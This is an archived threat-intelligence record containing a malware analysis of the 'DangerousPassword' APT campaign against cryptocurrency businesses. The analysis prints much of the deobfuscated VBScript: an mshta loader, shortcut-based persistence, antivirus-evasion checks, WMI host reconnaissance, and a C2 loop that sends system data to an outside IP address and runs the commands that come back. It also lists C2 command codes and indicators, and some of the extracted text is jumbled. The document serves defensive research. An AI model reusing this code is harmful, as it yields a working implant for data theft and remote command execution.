{
	"id": "7fa75681-6904-439e-bf5a-ecb498bd234d",
	"created_at": "2026-04-06T00:20:09.383604Z",
	"updated_at": "2026-04-10T03:35:21.512263Z",
	"deleted_at": null,
	"sha1_hash": "2cb6d5d576800eb381e27f7e70561d381e543819",
	"title": "CyberThreatIntel/offshore APT organization/DangerousPassword/2020-04-02/Analysis.md at master · StrangerealIntel/CyberThreatIntel",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 184679,
	"plain_text": "---\ntitle: Bitly\n---\nCyberThreatIntel/offshore APT organization/DangerousPassword/2020-\n04-02/Analysis.md at master · StrangerealIntel/CyberThreatIntel\nBy StrangerealIntel\nArchived: 2026-04-05 21:47:00 UTC\nDangerous Password\nTable of Contents\nMalware analysis\nCyber kill chain\nIndicators Of Compromise (IOC)\nReferences MITRE ATT\u0026CK Matrix\nLinks\nOriginal Tweet\nLink Anyrun\nArticles\nMalware analysis\nThe initial vector is a executable RAR archive content a edited lnk, this writes the file in the temp folder and executes the remote code by mshta call.\nMachineID IconFileName CommandLineArguments WorkingDirectory LocalBasePath\ndesktop-mn3id9\nC:\\Windows\\System32\\shell32.dll\n/c start /b\n%SystemRoot%\\System32\\mshta\nhttps[:]//bit.ly/2UiZH6V\nC:\\Users\\Public\\Music\\ C:\\Windows\\System32\\cmd.exe\nThe Bitly link redirects to a fake cloud solution which usurps a legitim service. (.club instead of .fr)\n[](\u003chttp://www.cloudfiles.club:8080/edit?id=T8YJQTVktMp8W%2Bj/W5EvDWglxOnw8evApd1RaERyZzz/Qzh2uXI/O\n\u003c/html\u003e\nThis executes a following Visual Basic code, the first two functions for decode the base 64 and create a stream object for manipulate data.\n\u003cscript language=\u003e)\n\n.Close\r\nend with\r\nend function\r\nThen this copy in the temp folder a file with a password and show it for the lure to the victim.\r\npay_req=\"CMD.EXE /C \"\"ECHO risk2020\u003e\"\"%TEMP%\\Password.txt\"\"\u0026NOTEPAD.EXE \"\"%TEMP%\\Password.txt\"\"\u0026DEL \"\"%TEMP%\\P\r\nset wish=CreateObject(\"wscript.shell\")\r\nwish.Run pay_req,0,false\r\nThe variable is reused for content the payload to execute in base 64 on the new persistence file by lnk file.\r\npay_req=\"b24gZXJyb3IgcmVzdW1lIG5leHQNCnJhbmRvbWl6ZQ0KaWYgV1NjcmlwdC5Bcmd1bWVudHMuTGVuZ3RoPjAgdGhlbg0KCUhUUD0ia\r\nThen, this creates the persistence previous said and use the same TTPs in using a lnk file with a mshta call.\r\nset fob=CreateObject(\"Scripting.FileSystemObject\")\r\npath_persistence=fob.GetSpecialFolder(2)\u0026\"\\Xbox.lnk\"\r\nSet tcl=wish.CreateShortcut(path_persistence)\r\ntcl.TargetPath=\"mshta\"\r\ntcl.Arguments=\"https://bit.ly/3dr8YBv\"\r\npath_file=fob.GetSpecialFolder(2)\u0026\"\\iilbat.vbs\"\r\nset btf=fob.OpenTextFile(path_file,2,true)\r\nbtf.Write dbsc(pay_req)\r\nbtf.Close()\r\nThe part of the code check by WMI request the process executed on the PC, modify the strategy in function of detection for avoid to be detected by the AV. Execute the next\r\nstage of the persistence.\r\nlist_process=\"\"\r\nset wmi=GetObject(\"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2\")\r\nset wmiresult=wmi.ExecQuery(\"Select * from Win32_Process\")\r\nfor each obj in wmiresult\r\nlist_process=list_process\u0026LCase(obj.Name)\u0026\"|\"\r\nnext\r\n'npprot -\u003e npprot.exe -\u003e Net Protector (Indian AV)\r\n'kwsprot -\u003ekwsprotect64.exe -\u003e Kingsoft Antivirus (Chinese AV)\r\nex=\"ws\"\r\nif Instr(list_process,\"kwsprot\")\u003e0 or Instr(list_process,\"npprot\")\u003e0 then\r\nex=\"cs\"\r\nend if\r\nln=\"start /b \"\u0026ex\u0026\"cript \"\"\"\u0026path_file\u0026\"\"\" \"+\"88.204.166.59:8080/edit\"\r\nln2=\" \u0026 move \"\"\"\u0026path_persistence\u0026\"\"\" \"\"\"\u0026 wish.SpecialFolders(\"startup\") \u0026\"\\\"\"\"\r\n'qhsafe -\u003e QHSafeTray.exe -\u003e Qihoo 360 Total Security (Chinese AV)\r\n'hudongf -\u003e zhudongfangyu.exe -\u003e Qihoo 360 security (Chinese AV)\r\nif Instr(list_process,\"hudongf\")\u003e0 or Instr(list_process,\"qhsafe\")\u003e0 then\r\nln2=\" \u0026 del \"\"\"\u0026path_persistence\u0026\"\"\"\"\r\nelse\r\ntcl.Save\r\nend if\r\nwish.run \"CMD.EXE /c \" \u0026 ln\u0026\" 1\" \u0026 \" \u0026 \" \u0026 ln\u0026\" 2\" \u0026 ln2,0,false\r\nwindow.close\r\n\u003c/script\u003e\r\nOnce decoded and deobfuscated, we can see this check if pushed argument exists before launch the script, this essential due to the URL to contact is pushing in argument. This\r\nuse random call for get a random number for add a random suffix with ?topic=sXXXXX . On the site, whatever the URL, this redirects on another code to execute.\r\non error resume next\r\nrandomize\r\nif WScript.Arguments.Length\u003e0 then\r\nurl=\"http://\"\u0026WScript.Arguments.Item(0)\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md\r\nPage 2 of 9\n\n---\ntitle: Bitly\n---\nset whr=CreateObject(\"WinHttp.WinHttpRequest.5.1\")\ndo while true\nrtc=\"\"\ntpc=url\u0026\"?topic=s\"\u0026Int(1000*rnd+9000)\nwhr.Open \"POST\",tpc,false\nwhr.Send \"200\"\nif whr.Status=200 Then\nrtc=whr.ResponseText\nend if\nif rtc\u0026lt;\u003e\"\" then\nExecute(rtc)\nexit do\nend if\nWScript.Sleep 180000 ' 50 min\nloop\nend if\nThe new bitly link redirect to a new domain witch usurp the Microsoft update domain, this load in memory the Visual Basic code to execute\n[0 ret=uget(uri) if ret=\"\" then if t=10 then exit function end if t=t+1 else exit do end if WScript.Sleep 60*1000 loop n=InStr(1,ret,\"#\") k=CLng(\"\u0026h\" \u0026 Mid(ret,1,n-1)) psc=Mid(ret,n+1,Len(ret)-n) sc=bdec(psc) psc=CStr(xdec(sc,k)) NStep=bdec(psc) end function function bdec(c) on error resume next const Base64 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\" dim dataLength, sOut, groupBegin c = Replace(c, vbCrLf, \"\") c = Replace(c, vbTab, \"\") c = Replace(c, \" \", \"\") dataLength = Len(c) if dataLength Mod 4 \u0026lt;\u003e 0 then exit function end if for groupBegin = 1 to dataLength step 4 dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut numDataBytes = 3 https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md Page 3 of 9](\u003chttp://www.msupdatepms.xyz:8080/edit?id=WOR%2BQhmDavXldv2sjyh%2BT0j4LYqP0ZVKAenNEEfEwIjzActclow\n\u003c/html\u003e\nThe first three functions of the code is for parse the code send by the C2 to execute on the PC, decode with base 64 and xor the code.\non error resume next\nfunction NStep(cmd)\nn=0\nt=0\nNStep=\u003e)\n\nnGroup = 0\r\nfor CharCounter = 0 to 3\r\nthisChar = Mid(c, groupBegin + CharCounter, 1)\r\nif thisChar = \"=\" then\r\nnumDataBytes = numDataBytes - 1\r\nthisData = 0\r\nelse\r\nthisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1\r\nend if\r\nif thisData = -1 then\r\nexit function\r\nend if\r\nnGroup = 64 * nGroup + thisData\r\nnext\r\nnGroup = Hex(nGroup)\r\nnGroup = String(6 - Len(nGroup), \"0\") \u0026 nGroup\r\npOut = Chr(CByte(\"\u0026H\" \u0026 Mid(nGroup, 1, 2)))\r\npOut = pOut \u0026 Chr(CByte(\"\u0026H\" \u0026 Mid(nGroup, 3, 2)))\r\npOut = pOut \u0026 Chr(CByte(\"\u0026H\" \u0026 Mid(nGroup, 5, 2)))\r\nsOut = sOut \u0026 Left(pOut, numDataBytes)\r\nnext\r\nbdec = sOut\r\nend function\r\nfunction xdec(input, pkey)\r\nxdec=\"\"\r\nfor i=1 to Len(input)\r\nxdec=xdec+chr(asc(mid(input, i, 1)) Xor pkey)\r\nnext\r\nend function\r\nThe three next functions use WMI requests for getting more informations about the system.\r\nfunction getUName()\r\ngetUName=\"\"\r\nset ObjWMI=GetObject(\"winmgmts:\\\\.\\root\\CIMV2\")\r\nset colItems=ObjWMI.ExecQuery(\"SELECT * FROM Win32_ComputerSystem\",,48)\r\nfor each objItem in colItems\r\nif not IsNull(objItem.UserName) then\r\ngetUName=objItem.UserName\r\nend if\r\nnext\r\nend function\r\nfunction getProc()\r\non error resume next\r\nset objWMIService = GetObject(\"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2\")\r\nset prclst = objWMIService.ExecQuery (\"Select * from Win32_Process\")\r\nfor each prc in prclst\r\nif InStr(1,prc.Name,\"svchost\",1)=0 And prc.ProcessID \u003c\u003e 0 And prc.ProcessID \u003c\u003e 4 then\r\ngetProc=getProc+ent+CStr(prc.ProcessID)+tab+CStr(prc.SessionID)+tab\r\nif IsNull(prc.CommandLine) then\r\ngetProc=getProc+prc.Name\r\nelse\r\ngetProc=getProc+prc.CommandLine\r\nend if\r\nend if\r\nnext\r\nend function\r\nfunction getInfo()\r\non error resume next\r\nset ObjWMI=GetObject(\"winmgmts:\\\\.\\root\\CIMV2\")\r\nset osItems = ObjWMI.ExecQuery(\"Select * from Win32_OperatingSystem\")\r\nset wdate=CreateObject(\"WbemScripting.SWbemDateTime\")\r\nfor each item In osItems\r\non error resume next\r\ngetInfo=getInfo\u0026\"Hostname:\"+tab+item.CSName+ent\r\ngetInfo=getInfo\u0026\"OS Name:\"+tab+item.Caption+\" \"+item.OSArchitecture+ent\r\ngetInfo=getInfo\u0026\"OS Version:\"+tab+item.Version+ent\r\nif not IsNull (item.InstallDate) then\r\nwdate.Value=item.InstallDate\r\ngetInfo=getInfo + \"Install Date:\"+tab+GetFormattedDate(wdate.GetVarDate(true))+ent\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md\r\nPage 4 of 9\n\nend if\r\nif not IsNull(item.LastBootUpTime) then\r\nwdate.Value=item.LastBootUpTime\r\ngetInfo=getInfo + \"Boot Time:\"+tab+FormatDateTime(wdate.GetVarDate(true))+ent\r\nend if\r\nnext\r\nset csItems=ObjWMI.ExecQuery(\"SELECT * FROM Win32_ComputerSystem\")\r\nset tzItems=ObjWMI.ExecQuery(\"SELECT * FROM Win32_TimeZone\")\r\nfor each item in csItems\r\ncTZ=item.CurrentTimeZone\r\nnext\r\nfor each tzitem in tzItems\r\nUtcName=tzitem.StandardName\r\nnext\r\ntimezone =\"(UTC \" + CStr(cTZ/60) +\" hours) \" +UtcName\r\ngetInfo=getInfo+\"Time Zone:\"+tab+timezone+ent\r\nset cpuItems=ObjWMI.ExecQuery( \"SELECT * FROM Win32_Processor\")\r\nfor each item in cpuItems\r\nselect case item.Architecture\r\ncase 0 cpuArch=\"x86\"\r\ncase 6 cpuArch=\"Itanium\"\r\ncase 9 cpuArch=\"x64\"\r\ncase else\r\ncpuArch=\"Unknown\"\r\nend select\r\ngetInfo=getInfo+\"CPU:\"+tab+tab+item.Name+\" (\" + cpuArch + \")\"+ent\r\nnext\r\ngetInfo=getInfo + \"Path: \"+tab+WScript.ScriptFullName+ent+ent\r\nset adapItems=ObjWMI.ExecQuery(\"SELECT * FROM Win32_NetworkAdapterConfiguration\",,48)\r\nfor each adapter in adapItems\r\non error resume next\r\nif isNull(adapter.IPAddress) then\r\nelse\r\ngetInfo=getInfo+\"Network Adapter:\"+tab\u0026adapter.Description+ent\r\ngetInfo=getInfo+\" MAC Address:\"+tab\u0026adapter.MACAddress + ent\r\ngetInfo=getInfo+\" IP Address:\"+tab+Join(adapter.IPAddress, \",\") + ent\r\ngetInfo=getInfo+\" Subnet Mask:\"+tab+Join(adapter.IPSubnet, \",\") + ent\r\ngetInfo=getInfo+\" Default Gateway:\"+tab+Join(adapter.DefaultIPGateway, \",\") + ent\r\nif adapter.DHCPEnabled=true then\r\ngetInfo=getInfo+\" DHCP Servers:\"+tab\u0026adapter.DHCPServer + ent\r\nend if\r\ngetInfo=getInfo+\" DNS Server:\"+tab+Join(adapter.DNSServerSearchOrder, \",\") + ent\r\nend if\r\nnext\r\nend function\r\nThe next functions are used for randomizing the ID and session and format the date to string.\r\nfunction rand()\r\nrandomize\r\nrand=Int(90000000*rnd)+10000000\r\nend function\r\nfunction randID()\r\nrandomize\r\nrandID=Int(1000*rnd)\r\nend function\r\nfunction GetFormattedDate (sDate)\r\nstrDate = CDate(sDate)\r\nstrDay = DatePart(\"d\", strDate)\r\nstrMonth = DatePart(\"m\", strDate)\r\nstrYear = DatePart(\"yyyy\", strDate)\r\nif strDay \u003c 10 then\r\nstrDay = \"0\" \u0026 strDay\r\nend if\r\nif strMonth \u003c 10 then\r\nstrMonth = \"0\" \u0026 strMonth\r\nend if\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md\r\nPage 5 of 9\n\nGetFormattedDate = strMonth \u0026 \"/\" \u0026 strDay \u0026\"/\" \u0026strYear\r\nend function\r\nThe last functions are used for sending the informations founded to the C2 and receive the reply of the C2.\r\nfunction post(u,content)\r\non error resume next\r\nset hReq=CreateObject(\"MSXML2.XMLHTTP\")\r\nul=u \u0026 \"\u0026isbn=\" \u0026 (timer()*100)\r\nhReq.Open \"POST\", ul, false\r\nhReq.Send content\r\nif hReq.Status=200 then\r\npost=hReq.responseText\r\nend if\r\nend function\r\nfunction uget(u)\r\non error resume next\r\nset hrq=CreateObject(\"MSXML2.XMLHTTP\")\r\nul=u \u0026 \"\u0026id=\" \u0026 (timer()*100)\r\nhrq.Open \"GET\", ul, false\r\nhrq.Send\r\nif hrq.Status=200 then\r\nuget=hrq.responseText\r\nend if\r\nend function\r\nThe main code launches the recon action on the system and format for request in clear the informations to the C2, in function of the response of the C2, this executes\r\ncommands on the system, in clear or with base 64 + substrings operations as obfuscation.\r\nset sh=CreateObject(\"wscript.Shell\")\r\nent=Chr(13)+Chr(10) '\\n\r\ntab=Chr(9) '\\t\r\nuID=CStr(rand())\r\nif WScript.Arguments.Length\u003e1 then\r\nuID=uID\u0026WScript.Arguments.Item(1)\r\nend if\r\nif WScript.Arguments.Length\u003e0 then\r\nuu=\"http://\"\u0026WScript.Arguments.Item(0)\r\nend if\r\nsData=getInfo()\r\nif IsNull(sData) then\r\nsData=\"\"\r\nend if\r\nsData=\"Username:\"+tab+getUName()+ent+sData\r\nsUri=\"\"\r\nurl=uu+\"?topic=v\"+CStr(randID())+\"\u0026session=\"+uID\r\ndo while 1\u003e0\r\npsc=\"\"\r\ncurDate = \"Current Time:\"\u0026tab\u0026Date\u0026\" \"\u0026Time\r\npl=getProc()\r\npData=curDate+ent+sData+ent\r\nif not IsNull(pl) then\r\npData=pData+pl\r\nend if\r\nres=post(url,pData)\r\nif InStr(1,res,\"20#\")\u003c\u003e0 then\r\npsc=NStep(res)\r\nif psc\u003c\u003e\"\" then\r\nExecute(psc)\r\nexit do\r\nend if\r\nelseif res=\"21\" then\r\nexit do\r\nelseif InStr(1,res,\"23#\")\u003c\u003e0 then\r\nnps=InStr(1,res,\"#\")\r\nExecute(bdec(Mid(res,nps+1,Len(res)-nps)))\r\nend if\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md\r\nPage 6 of 9\n\nWScript.Sleep 60*1000\r\nloop\r\nWe can list the codes used for the communications to the C2 and implant :\r\nNote : # is a wildcard in VBA for matches with any digit character\r\nCode Description\r\n20# Execute commands in clear\r\n21 Exit Session\r\n22 OK received informations (debug commands)\r\n23# Execute commands with base 64 + substrings operations as obfuscation\r\nWe can see on the informations send in clear to the C2 that the list of informations rest the same since mid 2019 :\r\nCurrent Time: 3/31/2020 3:31:37 AM\r\nUsername: USER-PC\\admin\r\nHostname: USER-PC\r\nOS Name: Microsoft Windows 7 Professional 32-bit\r\nOS Version: 6.1.7601\r\nInstall Date: 10/05/2017\r\nBoot Time: 3/31/2020 12:28:48 AM\r\nTime Zone: (UTC 1 hours) GMT Standard Time\r\nCPU: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz (x64)\r\nPath: C:\\Users\\admin\\AppData\\Local\\Temp\\iilbat.vbs\r\nNetwork Adapter: Intel(R) PRO/1000 MT Network Connection\r\n MAC Address: [MAC]\r\n IP Address: 192.168.X.X,[MAC]\r\n Subnet Mask: 255.255.255.0,64\r\n Default Gateway: 192.168.X.X\r\n DNS Server: 192.168.X.X\r\n264 0 smss.exe\r\n344 0 csrss.exe\r\n380 0 wininit.exe\r\n388 1 csrss.exe\r\n428 1 winlogon.exe\r\n472 0 services.exe\r\n484 0 lsass.exe\r\n492 0 lsm.exe\r\n1188 0 spoolsv.exe\r\n1364 0 IMEDICTUPDATE.EXE\r\n1428 0 qemu-ga.exe\r\n1968 1 \"taskhost.exe\"\r\n1984 1 taskeng.exe {DE21909D-DEE6-419E-AF8D-D6899DCE61F7}\r\n2044 1 \"C:\\Windows\\system32\\Dwm.exe\"\r\n372 1 C:\\Windows\\Explorer.EXE\r\n652 1 C:\\Windows\\System32\\ctfmon.exe\r\n1120 0 SearchIndexer.exe\r\n1932 1 \"windanr.exe\"\r\n2736 1 \"C:\\Program Files\\WinRAR\\WinRAR.exe\" \"C:\\Users\\admin\\AppData\\Local\\Temp\\3249e2eb1eaa628dcf7c83062463bc6b\r\n1720 1 \"C:\\Windows\\System32\\cmd.exe\" /C \"ECHO risk2020\u003eC:\\Users\\admin\\AppData\\Local\\Temp\\Password.txt\u0026NOTEPAD.E\r\n3020 1 \\??\\C:\\Windows\\system32\\conhost.exe \"1233334231726783925-1766655123-1154929739-1178529684175521206-10630\r\n680 1 NOTEPAD.EXE C:\\Users\\admin\\AppData\\Local\\Temp\\Password.txt\r\n588 0 WmiPrvSE.exe\r\n3292 1 wscript \"C:\\Users\\admin\\AppData\\Local\\Temp\\iilbat.vbs\" 88.204.166.59:8080/edit 1\r\n3284 1 wscript \"C:\\Users\\admin\\AppData\\Local\\Temp\\iilbat.vbs\" 88.204.166.59:8080/edit 2\r\nAccording with the analysis of the Japanese CERT (June 2019), the list is the same :\r\nUsername\r\nHostname\r\nOS version\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md\r\nPage 7 of 9\n\nOS install date\r\nOS runtime\r\nTimezone\r\nCPU name\r\nExecution path of vbs file\r\nNetwork adapter information\r\nList of running processes\r\nOn the opendir, like the last observations on the group, legit VNC binaries can be found, this indicates that the group have kept the same TTPs for the extraction of the data.\r\nThis high probable that the group do manual actions for reduce the security measures and execute the tools for obtain the data on the crypto-occurencies.\r\nChina doesn't recognize cryptocurrencies as legal tender and the banking system isn't accepting cryptocurrencies or providing relevant services for trading in place since\r\nSeptember 2017. The Chinese government has recently promoted a law facilitating the transition to the exchange of a virtual currency led by the state, this change explained\r\nwhy since the campaign of January, China is now in the focus of the Asian countries targeted by the group (the announcement also caused an increase in bitcoins and these\r\nderivative currencies). The TTPs of the group are the same since mid 2019 and rest focus on the steal of the crypto-occurencies.\r\nCyber kill chain\r\nThis process graph represent the cyber kill chain used by the attacker.\r\nIndicators Of Compromise (IOC)\r\nThe IOC can be exported in JSON and CSV\r\nReferences MITRE ATT\u0026CK Matrix\r\nEnterprise tactics Technics used Ref URL\r\nExecution\r\nCommand-Line Interface\r\nScripting\r\nMshta\r\nhttps://attack.mitre.org/techniques/T1059/\r\nhttps://attack.mitre.org/techniques/T1064/\r\nhttps://attack.mitre.org/techniques/T1170/\r\nDefense Evasion\r\nScripting\r\nInstall Root Certificate\r\nMshta\r\nhttps://attack.mitre.org/techniques/T1064/\r\nhttps://attack.mitre.org/techniques/T1130/\r\nhttps://attack.mitre.org/techniques/T1170/\r\nDiscovery Query Registry https://attack.mitre.org/techniques/T1012/\r\nThis can be exported as JSON format Export in JSON\r\nLinks\r\nOriginal tweet:\r\nhttps://twitter.com/Rmy_Reserve/status/1244817235211739141\r\nLinks Anyrun:\r\nhttps://app.any.run/tasks/67ebd848-26f8-4cb3-9a1f-8ff4f3a0c12e\r\nArticles\r\nSpear Phishing against Cryptocurrency Businesses\r\n[Chinese]The Nightmare of Global Cryptocurrency Companies: Demystifying APT Group's \"Dangerous Passwords\"\r\nChina Enacts Crypto Law in Run-Up to State Digital Currency Debut\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md\r\nPage 8 of 9\n\nSource: https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md"
	],
	"report_names": [
		"Analysis.md"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434809,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2cb6d5d576800eb381e27f7e70561d381e543819.pdf",
		"text": "https://archive.orkl.eu/2cb6d5d576800eb381e27f7e70561d381e543819.txt",
		"img": "https://archive.orkl.eu/2cb6d5d576800eb381e27f7e70561d381e543819.jpg"
	}
}